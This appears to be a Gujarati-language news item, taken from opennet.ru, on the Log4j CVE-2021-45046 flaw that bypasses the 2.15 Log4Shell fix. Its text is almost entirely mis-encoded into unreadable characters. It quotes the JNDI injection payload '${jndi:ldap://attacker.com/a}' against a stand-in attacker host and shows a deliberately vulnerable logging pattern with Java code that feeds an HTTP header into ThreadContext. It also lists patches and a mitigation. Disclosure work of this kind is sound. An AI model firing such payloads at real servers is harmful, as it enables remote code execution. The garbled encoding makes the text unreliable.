Log4j 2 เชฒเชพเชเชฌเซเชฐเซเชฐเซ (CVE-2021-45046) เชฎเชพเช JNDI เชฒเซเชเช เชชเชจเชพ เช เชฎเชฒเซเชเชฐเชฃเชฎเชพเช เช เชจเซเชฏ เชจเชฌเชณเชพเช เชเชณเชเชตเชพเชฎเชพเช เชเชตเซ เชเซ, เชเซ เชชเซเชฐเชเชพเชถเชจ 2.15 เชฎเชพเช เชเชฎเซเชฐเชตเชพเชฎเชพเช เชเชตเซเชฒเชพ เชธเซเชงเชพเชฐเชพเช เช เชจเซ เชธเซเชฐเชเซเชทเชพ เชฎเชพเชเซ "log4j2.noFormatMsgLookup" เชธเซเชเชฟเชเชเชจเชพ เชเชชเชฏเซเชเชจเซ เชงเซเชฏเชพเชจเชฎเชพเช เชฒเซเชงเชพ เชตเชฟเชจเชพ เชฆเซเชเชพเชฏ เชเซ. เชธเชฎเชธเซเชฏเชพ เชฎเซเชเซเชฏเชคเซเชตเซ Log4j 2 เชจเซ เชเซเชจเซ เชเชตเซเชคเซเชคเชฟเช เชฎเชพเชเซ เชเชคเชฐเชจเชพเช เชเซ, เชเซ โnoFormatMsgLookupโ เชซเซเชฒเซเชเชจเซ เชเชชเชฏเซเช เชเชฐเซเชจเซ เชธเซเชฐเชเซเชทเชฟเชค เชเซ, เชเชพเชฐเชฃ เชเซ เชคเซ เช เชเชพเชเชจเซ เชจเชฌเชณเชพเชเช (Log4Shell, CVE-2021-44228) เชฅเซ เชฐเชเซเชทเชฃเชจเซ เชฌเชพเชฏเชชเชพเชธ เชเชฐเชตเชพเชจเซเช เชถเชเซเชฏ เชฌเชจเชพเชตเซ เชเซ, เชเซ เชคเชฎเชจเซ เชคเชฎเชพเชฐเชพ เชเซเชกเชจเซ เชเชเซเชเชฟเชเซเชฏเซเช เชเชฐเชตเชพเชจเซ เชฎเชเชเซเชฐเซ เชเชชเซ เชเซ. เชธเชฐเซเชตเชฐ เชธเชเชธเซเชเชฐเชฃ 2.15 เชจเชพ เชตเชชเชฐเชพเชถเชเชฐเซเชคเชพเช เชฎเชพเชเซ, เชถเซเชทเชฃ เชเชชเชฒเชฌเซเชง เชธเชเชธเชพเชงเชจเซเชจเชพ เชฅเชพเชเชจเซ เชเชพเชฐเชฃเซ เชเชชเซเชฒเชฟเชเซเชถเชจเชจเซ เชเซเชฐเซเชถ เชเชฐเชตเชพ เชฎเชพเชเซ เชฎเชฐเซเชฏเชพเชฆเชฟเชค เชเซ.
เชจเชฌเชณเชพเช เชซเชเซเชค เชคเซ เชธเชฟเชธเซเชเชฎเซ เชชเชฐ เช เชฆเซเชเชพเชฏ เชเซ เชเซ เชฒเซเชเซเชเช เชฎเชพเชเซ เชธเชเชฆเชฐเซเชญ เชฒเซเชเช เชชเชจเซ เชเชชเชฏเซเช เชเชฐเซ เชเซ, เชเซเชฎ เชเซ ${ctx:loginId}, เช เชฅเชตเชพ MDC เชเซเชฎเซเชชเชฒเซเชเซเชธ (เชฅเซเชฐเซเชก เชธเชเชฆเชฐเซเชญ เชจเชเชถเซ), เชเซเชฎ เชเซ %X, %mdc เช เชจเซ %MDC. เชเชชเชฐเซเชถเชจ เชฒเซเชเชฎเชพเช เชเชเชเชชเซเช เชซเซเชฐเซเชฎเซเชเชฟเชเช เชฎเชพเชเซเชจเชพ เชจเชฟเชฏเชฎเซเชจเซ เชตเซเชฏเชพเชเซเชฏเชพเชฏเชฟเชค เชเชฐเชคเซ เชเชชเซเชฒเชฟเชเซเชถเชจเชฎเชพเช เชธเชเชฆเชฐเซเชญ เชเซเชตเซเชฐเซเช เช เชฅเชตเชพ MDC เชเซเชฎเซเชชเซเชฒเซเชเซเชธเชจเซ เชเชชเชฏเซเช เชเชฐเชคเซ เชตเชเชคเซ เชฒเซเชเชฎเชพเช JNDI เช เชตเซเชเซ เชงเชฐเชพเชตเชคเชพ เชกเซเชเชพเชจเซ เชเชเชเชชเซเช เชเชฐเชตเชพ เชฎเชพเชเซ เชถเชฐเชคเซ เชฌเชจเชพเชตเชตเชพ เชฎเชพเชเซ เชจเซเชเซ เชเชตเซ เชเซ.
LunaSec เชจเชพ เชธเชเชถเซเชงเชเซเช เชจเซเชเชงเซเชฏเซเช เชเซ Log4j เชจเซ 2.15 เชฅเซ เชเชเซ เชเชตเซเชคเซเชคเชฟเช เชฎเชพเชเซ, เช เชจเชฌเชณเชพเชเชจเซ เชเชชเชฏเซเช Log4Shell เชนเซเชฎเชฒเชพ เชฎเชพเชเซ เชจเชตเชพ เชตเซเชเซเชเชฐ เชคเชฐเซเชเซ เชฅเช เชถเชเซ เชเซ, เชเซ เชเซเชก เชเชเซเชเซเชเซเชฏเซเชถเชจ เชคเชฐเชซ เชฆเซเชฐเซ เชเชพเชฏ เชเซ, เชเซ ThreadContext เช เชญเชฟเชตเซเชฏเชเซเชคเชฟเช เชเซเชฎเชพเช เชฌเชพเชนเซเชฏ เชกเซเชเชพเชจเซ เชธเชฎเชพเชตเซเชถ เชฅเชพเชฏ เชเซ เชคเซเชจเซ เชเชชเชฏเซเช เชฒเซเช เชเชเชเชชเซเชเชฎเชพเช เชฅเชพเชฏ เชเซ, เชชเชเซ เชญเชฒเซเชจเซ "protect" เชซเซเชฒเซเช เชธเชเซเชทเชฎ เชเซ. noMsgFormatLookups" เช เชฅเชตเชพ เชเซเชฎเซเชชเชฒเซเช "%m{nolookups}".
เชธเชเชฐเชเซเชทเชฃเชจเซ เชฌเชพเชฏเชชเชพเชธ เชเชฐเชตเซเช เช เชนเชเซเชเชค เชชเชฐ เชเชตเซ เชเซ เชเซ "${jndi:ldap://attacker.com/a}" เชจเชพ เชธเซเชงเชพ เช เชตเซเชเซเชจเซ เชฌเชฆเชฒเซ, เช เช เชญเชฟเชตเซเชฏเชเซเชคเชฟ เชฒเซเช เชเชเชเชชเซเชเชจเชพ เชซเซเชฐเซเชฎเซเชเชฟเชเช เชฎเชพเชเซเชจเชพ เชจเชฟเชฏเชฎเซเชฎเชพเช เชตเชชเชฐเชพเชคเชพ เชฎเชงเซเชฏเชตเชฐเซเชคเซ เชเชฒเชจเชพ เชฎเซเชฒเซเชฏ เชฆเซเชตเชพเชฐเชพ เชฌเชฆเชฒเชตเชพเชฎเชพเช เชเชตเซ เชเซ. . เชเชฆเชพเชนเชฐเชฃ เชคเชฐเซเชเซ, เชเซ เชฒเซเชเชฎเชพเช เชเชเชเชชเซเช เชเชฐเชคเซ เชตเชเชคเซ เชธเชเชฆเชฐเซเชญ เชเซเชตเซเชฐเซ ${ctx:apiversion}เชจเซ เชเชชเชฏเซเช เชเชฐเชตเชพเชฎเชพเช เชเชตเซ เชเซ, เชคเซ เชชเชเซ เชเชเซเชเชฎเชพเช เชกเซเชเชพ "${jndi:ldap://attacker.com/a}" เชจเซ เชฌเชฆเชฒเซเชจเซ เชเชเซเชฐเชฎเชฃ เชเชฐเซ เชถเชเชพเชฏ เชเซ. เชเชชเซเชตเชฐเซเชเชจ เชเชฒ เชชเชฐ เชฒเชเชพเชฏเซเชฒ เชฎเซเชฒเซเชฏ. เชธเชเชตเซเชฆเชจเชถเซเชฒ เชเซเชกเชจเซเช เชเชฆเชพเชนเชฐเชฃ: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") เชชเชฌเซเชฒเชฟเช เชธเซเชเซเชฐเชฟเชเช เชเชจเซเชกเซเชเซเชธ(@RequestHeader("X-Api-Version") String apiVersion) { // "X-Api-Version" HTTP เชนเซเชกเชฐ เชตเซเชฒเซเชฏเซ ThreadContext ThreadContext.put("apiversion) เชจเซ เชชเชธเชพเชฐ เชเชฐเชตเชพเชฎเชพเช เชเชตเซ เชเซ. ", apiVersion ); // เชฒเซเชเชฎเชพเช เชเชเชเชชเซเช เชเชฐเชคเซ เชตเชเชคเซ, ${ctx:apiversion} logger.info("API เชธเชเชธเซเชเชฐเชฃ เชฎเชพเชเซ เชตเชฟเชจเชเชคเซ เชชเซเชฐเชพเชชเซเชค เชฅเช"); เชชเชพเชเชพ เชซเชฐเซ "เชนเซเชฒเซ, เชตเชฟเชถเซเชต!"; }
Log4j เชธเชเชธเซเชเชฐเชฃ 2.15 เชฎเชพเช, ThreadContext เชชเชฐ เชฎเซเชฒเซเชฏเซ เชชเชธเชพเชฐ เชเชฐเชคเซ เชตเชเชคเซ เชจเชฌเชณเชพเชเชจเซ เชเชชเชฏเซเช DoS เชนเซเชฎเชฒเชพ เชเชฐเชตเชพ เชฎเชพเชเซ เชฅเช เชถเชเซ เชเซ, เชชเชฐเชฟเชฃเชพเชฎเซ เชเชเชเชชเซเช เชซเซเชฐเซเชฎเซเชเชฟเชเช เชเซเชฎเซเชชเชฒเซเช เชชเซเชฐเซเชธเซเชธเชฟเชเชเชฎเชพเช เชฒเซเชช เชเชตเซ เชเซ.
เชจเชฌเชณเชพเชเชจเซ เช เชตเชฐเซเชงเชฟเชค เชเชฐเชตเชพ เชฎเชพเชเซ, เช เชชเชกเซเชเซเชธ 2.16 เช เชจเซ 2.12.2 เชชเซเชฐเชเชพเชถเชฟเชค เชเชฐเชตเชพเชฎเชพเช เชเชตเซเชฏเชพ เชนเชคเชพ. Log4j 2.16 เชถเชพเชเชพเชฎเชพเช, เชธเชเชธเซเชเชฐเชฃ 2.15 เชฎเชพเช เช เชฎเชฒเชฎเชพเช เชฎเซเชเชพเชฏเซเชฒเชพ เชธเซเชงเชพเชฐเชพเช เช เชจเซ "เชฒเซเชเชฒเชนเซเชธเซเช" เชฎเชพเชเซ JNDI LDAP เชตเชฟเชจเชเชคเซเชเชจเชพ เชฌเชเชงเชจ เชเชชเชฐเชพเชเชค, JNDI เชเชพเชฐเซเชฏเชเซเชทเชฎเชคเชพ เชกเชฟเชซเซเชฒเซเช เชฐเซเชชเซ เชธเชเชชเซเชฐเซเชฃเชชเชฃเซ เช เชเซเชทเชฎ เชเซ เช เชจเซ เชธเชเชฆเซเชถ เช เชตเซเชเซ เชจเชฎเซเชจเชพเช เชฎเชพเชเซเชจเชพ เชธเชฎเชฐเซเชฅเชจเชจเซ เชฆเซเชฐ เชเชฐเชตเชพเชฎเชพเช เชเชตเซ เชเซ. เชธเซเชฐเชเซเชทเชพเชจเชพ เชเชเซเชฒ เชคเชฐเซเชเซ, เชเซเชฒเชพเชธเชชเชพเชฅเชฎเชพเชเชฅเซ JndiLookup เชตเชฐเซเชเชจเซ เชฆเซเชฐ เชเชฐเชตเชพเชจเซเช เชธเซเชเชจ เชเชฐเชตเชพเชฎเชพเช เชเชตเซ เชเซ (เชเชฆเชพเชนเชฐเชฃ เชคเชฐเซเชเซ, โzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.classโ) .
เชคเชฎเซ เชกเชฟเชธเซเชเซเชฐเชฟเชฌเซเชฏเซเชถเชจเซเชธ (เชกเซเชฌเชฟเชฏเชจ, เชเชฌเซเชจเซเชเซ, เชเชฐเชเชเชเชเชฒ, เชธเซเชธเซ, เชซเซเชกเซเชฐเชพ, เชเชฐเซเช) เช
เชจเซ เชเชพเชตเชพ เชชเซเชฒเซเชเชซเซเชฐเซเชฎ เชเชคเซเชชเชพเชฆเชเซ (เชเซเชเชนเชฌ, เชกเซเชเชฐ, เชเชฐเซเชเชฒ, เชตเซเชเชฎเชตเซเชฐ, เชฌเซเชฐเซเชกเชเซเชฎ เช
เชจเซ เชเชฎเซเชเซเชจ/เชเชกเชฌเซเชฒเซเชฏเซเชเชธ, เชเซเชจเชฟเชชเชฐ, เชตเซเชเชฎเชตเซเชฐ, Cisco, IBM , Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, เชตเชเซเชฐเซ).
เชธเซเชฐเซเชธ: opennet.ru